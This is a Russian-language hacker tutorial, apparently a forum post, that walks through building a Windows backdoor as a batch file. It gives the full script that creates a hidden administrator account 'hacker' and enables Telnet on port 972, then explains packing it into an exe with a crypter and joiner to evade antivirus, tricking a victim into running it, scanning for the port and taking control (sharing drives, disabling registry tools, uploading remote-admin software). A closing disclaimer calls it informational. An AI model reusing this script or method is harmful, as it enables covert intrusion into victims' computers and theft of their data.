chcp 1251 net user SUPPORT_388945a0 /delete net user hacker hack /add net localgroup Администраторы hacker /add net localgroup Пользователи SUPPORT_388945a0 /del regedit /s conf.reg sc config tlntsvr start= auto tlntadmn config port=972 sec=-NTLM net start Telnet
все это пишешь в блокноте, и сохраняем как *.bat Теперь пояснения: chcp 1251 меняет кодировку на 1251, так как батник написан не в дос кодировке. net user SUPPORT_388945a0 /delete и net localgroup Пользователи — удаляют стандартную первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server. net user hacker hack /add и net localgroup Администраторы hacker /add — не трудно догадаться, что этими командами создаётся новая учетная запись с админскими правами, где логин: hacker пасс: hack Так как при создании нового админа он будет виден в welcome screen’е, отключить его можно импортировав рег файл в реестр, следующего содержания: Содержимое conf.re
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t] »hacker»=dword:00000000
Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start= auto которая меняет тип его запуска на автоматический(по дефолту disabled ). При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это палевно, поэтому советую прописывать этой командой tlntadmn config port=972 sec=-NTLM , редко используемый порт. В нашем случае это 972. Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet окончательно запустит наш бэкдор. теперь проверим правильный ли синтаксис кода. Открываем командную строку, если она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код, запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так: Пуск -> Выполнить -> пишем services.msc -> Ok Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и смотришь её свойства. При необходимости в любой момент можно её отключить. Вот батник готов, и как ты видишь он слишком палевны, при его запуске вылетает консольное черное окно, говорящее о выполняемых процессах в командной строке. Но не все так плохо, тебе поможет такая прога, как QuickBatchFileCompiler http://ifolder.ru/7197807. Она компилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батник превратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле. Вроде готово… Но не совсем, ты же не будешь дарить пустой экзешник, поэтому бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно скачать тут http://ifolder.ru/7198272 pohernah107(13 кб) а джойнер можешь взять здесь http://ifolder.ru/7197872 RedBindeR_v1.3_Mod(460 кб) . Они помогут тебе склеить файлы в один и изменить сигнатуру дабы не палится антивирусами. Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвы тебе осталось только подключится к телнету через указанный тобой порт. Бывает так что жертва находится в глобальной сети www у которой IP динамический, в этом случаи, зная диапазон IP его провайдера можно просканировать эту сеть на открытый наш редко используемый 972 Порт. А чтобы знать когда твой »друг» в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент. Осталось подключится. Для этого можешь выбрать стандартный виндосовский клиент который находится тут c:WINDOWSsystem32telnet.exe. Запускаешь. Пишешь:
Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]
если пишет:
Welcome to Microsoft Telnet Service login:_ то всё акей =)) Вводишь: login: hacker password: hack Появляется надпись: *===================================================== Вас приветствует Telnet-сервер производства корпорации Майкрософт *===================================================== C:>_
Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь управлять кампом, отдавая команды… Можно к примеру расшарить диски:
C:>net share disk_c=c: > nul C:>net share disk_d=d: > nul C:>net share disk_e=e: > nul
перезагрузить комп:
C:>shutdown -r -t 1 -c -f
прописать какой-нибудь ключ реестра:C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f — который запретит доступ к нему или поднять ftp сервер и залить радмина для более удобного удаленного администрирования:
C:>ftp
В общем-то, здесь уже играет фантазия взломщика =) Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире. P.S. На все непонятные термины и выражения есть Гугл. Внимание!!! Данная статья — это не побуждение к действию, все описанное здесь попадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашей информационной безопасности/